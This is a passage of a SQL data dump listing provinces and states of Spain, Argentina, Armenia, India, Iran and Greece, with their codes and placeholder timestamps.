00:00:00',0),(329,1,195,0,'Baleares','BAL','07',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(330,1,195,0,'Barcelona','BAR','08',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(331,1,195,0,'Burgos','BUR','09',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(332,1,195,0,'Caceres','CAC','10',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(333,1,195,0,'Cadiz','CAD','11',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(334,1,195,0,'Cantabria','CAN','39',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(335,1,195,0,'Castellon','CAS','12',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(336,1,195,0,'Ceuta','CEU','51',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(337,1,195,0,'Ciudad Real','CIU','13',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(338,1,195,0,'Cordoba','COR','14',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(339,1,195,0,'Cuenca','CUE','16',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(340,1,195,0,'Girona','GIR','17',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(341,1,195,0,'Granada','GRA','18',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(342,1,195,0,'Guadalajara','GUA','19',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(343,1,195,0,'Guipuzcoa','GUI','20',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(344,1,195,0,'Huelva','HUL','21',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(345,1,195,0,'Huesca','HUS','22',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(346,1,195,0,'Jaen','JAE','23',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(347,1,195,0,'La Rioja','LRI','26',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(348,1,195,0,'Las Palmas','LPA','35',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(349,1,195,0,'Leon','LEO','24',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(350,1,195,0,'Lleida','LLE','25',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(351,1,195,0,'Lugo','LUG','27',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(352,1,195,0,'Madrid','MAD','28',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(353,1,195,0,'Malaga','MAL','29',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(354,1,195,0,'Melilla','MEL','52',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(355,1,195,0,'Murcia','MUR','30',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(356,1,195,0,'Navarra','NAV','31',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(357,1,195,0,'Ourense','OUR','32',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(358,1,195,0,'Palencia','PAL','34',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(359,1,195,0,'Pontevedra','PON','36',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(360,1,195,0,'Salamanca','SAL','37',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(361,1,195,0,'Santa Cruz de Tenerife','SCT','38',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(362,1,195,0,'Segovia','SEG','40',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(363,1,195,0,'Sevilla','SEV','41',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(364,1,195,0,'Soria','SOR','42',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(365,1,195,0,'Tarragona','TAR','43',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(366,1,195,0,'Teruel','TER','44',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(367,1,195,0,'Toledo','TOL','45',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(368,1,195,0,'Valencia','VAL','46',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(369,1,195,0,'Valladolid','VLL','47',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(370,1,195,0,'Vizcaya','VIZ','48',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(371,1,195,0,'Zamora','ZAM','49',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(372,1,195,0,'Zaragoza','ZAR','50',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(373,1,10,0,'Buenos Aires','BAS','BA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(374,1,10,0,'Ciudad Autonoma De Buenos Aires','CBA','CB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(375,1,10,0,'Catamarca','CAT','CA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(376,1,10,0,'Chaco','CHO','CH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(377,1,10,0,'Chubut','CTT','CT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(378,1,10,0,'Cordoba','COD','CO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(379,1,10,0,'Corrientes','CRI','CR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(380,1,10,0,'Entre Rios','ERS','ER',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(381,1,10,0,'Formosa','FRM','FR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(382,1,10,0,'Jujuy','JUJ','JU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(383,1,10,0,'La Pampa','LPM','LP',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(384,1,10,0,'La Rioja','LRI','LR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(385,1,10,0,'Mendoza','MED','ME',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(386,1,10,0,'Misiones','MIS','MI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(387,1,10,0,'Neuquen','NQU','NQ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(388,1,10,0,'Rio Negro','RNG','RN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(389,1,10,0,'Salta','SAL','SA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(390,1,10,0,'San Juan','SJN','SJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(391,1,10,0,'San Luis','SLU','SL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(392,1,10,0,'Santa Cruz','SCZ','SC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(393,1,10,0,'Santa Fe','SFE','SF',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(394,1,10,0,'Santiago Del Estero','SEN','SE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(395,1,10,0,'Tierra Del Fuego','TFE','TF',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(396,1,10,0,'Tucuman','TUC','TU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(397,1,11,0,'Aragatsotn','ARG','AG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(398,1,11,0,'Ararat','ARR','AR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(399,1,11,0,'Armavir','ARM','AV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(400,1,11,0,'Gegharkunik','GEG','GR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(401,1,11,0,'Kotayk','KOT','KT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(402,1,11,0,'Lori','LOR','LO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(403,1,11,0,'Shirak','SHI','SH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(404,1,11,0,'Syunik','SYU','SU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(405,1,11,0,'Tavush','TAV','TV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(406,1,11,0,'Vayots-Dzor','VAD','VD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(407,1,11,0,'Yerevan','YER','ER',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(408,1,99,0,'Andaman & Nicobar Islands','ANI','AI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(409,1,99,0,'Andhra Pradesh','AND','AN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(410,1,99,0,'Arunachal Pradesh','ARU','AR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(411,1,99,0,'Assam','ASS','AS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(412,1,99,0,'Bihar','BIH','BI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(413,1,99,0,'Chandigarh','CHA','CA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(414,1,99,0,'Chhatisgarh','CHH','CH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(415,1,99,0,'Dadra & Nagar Haveli','DAD','DD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(416,1,99,0,'Daman & Diu','DAM','DA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(417,1,99,0,'Delhi','DEL','DE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(418,1,99,0,'Goa','GOA','GO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(419,1,99,0,'Gujarat','GUJ','GU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(420,1,99,0,'Haryana','HAR','HA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(421,1,99,0,'Himachal Pradesh','HIM','HI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(422,1,99,0,'Jammu & Kashmir','JAM','JA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(423,1,99,0,'Jharkhand','JHA','JH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(424,1,99,0,'Karnataka','KAR','KA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(425,1,99,0,'Kerala','KER','KE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(426,1,99,0,'Lakshadweep','LAK','LA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(427,1,99,0,'Madhya Pradesh','MAD','MD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(428,1,99,0,'Maharashtra','MAH','MH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(429,1,99,0,'Manipur','MAN','MN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(430,1,99,0,'Meghalaya','MEG','ME',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(431,1,99,0,'Mizoram','MIZ','MI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(432,1,99,0,'Nagaland','NAG','NA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(433,1,99,0,'Orissa','ORI','OR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(434,1,99,0,'Pondicherry','PON','PO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(435,1,99,0,'Punjab','PUN','PU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(436,1,99,0,'Rajasthan','RAJ','RA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(437,1,99,0,'Sikkim','SIK','SI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(438,1,99,0,'Tamil Nadu','TAM','TA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(439,1,99,0,'Tripura','TRI','TR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(440,1,99,0,'Uttaranchal','UAR','UA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(441,1,99,0,'Uttar Pradesh','UTT','UT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(442,1,99,0,'West Bengal','WES','WE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(443,1,101,0,'Ahmadi va Kohkiluyeh','BOK','BO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(444,1,101,0,'Ardabil','ARD','AR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(445,1,101,0,'Azarbayjan-e Gharbi','AZG','AG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(446,1,101,0,'Azarbayjan-e Sharqi','AZS','AS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(447,1,101,0,'Bushehr','BUS','BU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(448,1,101,0,'Chaharmahal va Bakhtiari','CMB','CM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(449,1,101,0,'Esfahan','ESF','ES',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(450,1,101,0,'Fars','FAR','FA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(451,1,101,0,'Gilan','GIL','GI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(452,1,101,0,'Gorgan','GOR','GO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(453,1,101,0,'Hamadan','HAM','HA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(454,1,101,0,'Hormozgan','HOR','HO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(455,1,101,0,'Ilam','ILA','IL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(456,1,101,0,'Kerman','KER','KE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(457,1,101,0,'Kermanshah','BAK','BA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(458,1,101,0,'Khorasan-e Junoubi','KHJ','KJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(459,1,101,0,'Khorasan-e Razavi','KHR','KR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(460,1,101,0,'Khorasan-e Shomali','KHS','KS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(461,1,101,0,'Khuzestan','KHU','KH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(462,1,101,0,'Kordestan','KOR','KO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(463,1,101,0,'Lorestan','LOR','LO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(464,1,101,0,'Markazi','MAR','MR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(465,1,101,0,'Mazandaran','MAZ','MZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(466,1,101,0,'Qazvin','QAS','QA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(467,1,101,0,'Qom','QOM','QO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(468,1,101,0,'Semnan','SEM','SE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(469,1,101,0,'Sistan va Baluchestan','SBA','SB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(470,1,101,0,'Tehran','TEH','TE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(471,1,101,0,'Yazd','YAZ','YA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(472,1,101,0,'Zanjan','ZAN','ZA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(535,1,84,0,'ΛΕΥΚΑΔΑΣ','ΛΕΥ','ΛΕ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(532,1,84,0,'ΛΑΡΙΣΑΣ','ΛΑΡ','ΛΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(504,1,84,0,'ΑΡΚΑΔΙΑΣ','ΑΡΚ','ΑΚ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(503,1,84,0,'ΑΡΓΟΛΙΔΑΣ','ΑΡΓ','ΑΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(533,1,84,0,'ΛΑΣΙΘΙΟΥ','ΛΑΣ','ΛΑ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(534,1,84,0,'ΛΕΣΒΟΥ','ΛΕΣ','ΛΣ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(530,1,84,0,'ΚΥΚΛΑΔΩΝ','ΚΥΚ','ΚΥ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(553,1,84,0,'ΑΙΤΩΛΟΑΚΑΡΝΑΝΙΑΣ','ΑΙΤ','ΑΙ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(529,1,84,0,'ΚΟΡΙΝΘΙΑΣ','ΚΟΡ','ΚΟ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(531,1,84,0,'ΛΑΚΩΝΙΑΣ','ΛΑΚ','ΛK',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(517,1,84,0,'ΗΜΑΘΙΑΣ','ΗΜΑ','ΗΜ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(518,1,84,0,'ΗΡΑΚΛΕΙΟΥ','ΗΡΑ','ΗΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(519,1,84,0,'ΘΕΣΠΡΩΤΙΑΣ','ΘΕΠ','ΘΠ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(520,1,84,0,'ΘΕΣΣΑΛΟΝΙΚΗΣ','ΘΕΣ','ΘΕ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(521,1,84,0,'ΙΩΑΝΝΙΝΩΝ','ΙΩΑ','ΙΩ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(522,1,84,0,'ΚΑΒΑΛΑΣ','ΚΑΒ','ΚΒ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(523,1,84,0,'ΚΑΡΔΙΤΣΑΣ','ΚΑΡ','ΚΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(524,1,84,0,'ΚΑΣΤΟΡΙΑΣ','ΚΑΣ','ΚΣ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(525,1,84,0,'ΚΕΡΚΥΡΑΣ','ΚΕΡ','ΚΕ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(526,1,84,0,'ΚΕΦΑΛΛΗΝΙΑΣ','ΚΕΦ','ΚΦ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(527,1,84,0,'ΚΙΛΚΙΣ','ΚΙΛ','ΚΙ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(528,1,84,0,'ΚΟΖΑΝΗΣ','ΚΟΖ','ΚZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(507,1,84,0,'ΑΧΑΪΑΣ','ΑΧΑ','ΑΧ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(508,1,84,0,'ΒΟΙΩΤΙΑΣ','ΒΟΙ','ΒΟ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(509,1,84,0,'ΓΡΕΒΕΝΩΝ','ΓΡΕ','ΓΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(510,1,84,0,'ΔΡΑΜΑΣ','ΔΡΑ','ΔΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(511,1,84,0,'ΔΩΔΕΚΑΝΗΣΟΥ','ΔΩΔ','ΔΩ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(512,1,84,0,'ΕΒΡΟΥ','ΕΒΡ','ΕΒ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(513,1,84,0,'ΕΥΒΟΙΑΣ','ΕΥΒ','ΕΥ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(514,1,84,0,'ΕΥΡΥΤΑΝΙΑΣ','ΕΥΡ','ΕΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(515,1,84,0,'ΖΑΚΥΝΘΟΥ','ΖΑΚ','ΖΑ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(516,1,84,0,'ΗΛΕΙΑΣ','ΗΛΕ','ΗΛ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(505,1,84,0,'ΑΡΤΑΣ','ΑΡΤ','ΑΑ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(506,1,84,0,'ΑΤΤΙΚΗΣ','ΑΤΤ','ΑΤ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(536,1,84,0,'ΜΑΓΝΗΣΙΑΣ','ΜΑΓ','ΜΑ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(537,1,84,0,'ΜΕΣΣΗΝΙΑΣ','ΜΕΣ','ΜΕ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(538,1,84,0,'ΞΑΝΘΗΣ','ΞΑΝ','ΞΑ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(539,1,84,0,'ΠΕΛΛΗΣ','ΠΕΛ','ΠΕ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(540,1,84,0,'ΠΙΕΡΙΑΣ','ΠΙΕ','ΠΙ',0,0,1,'0000-00-00 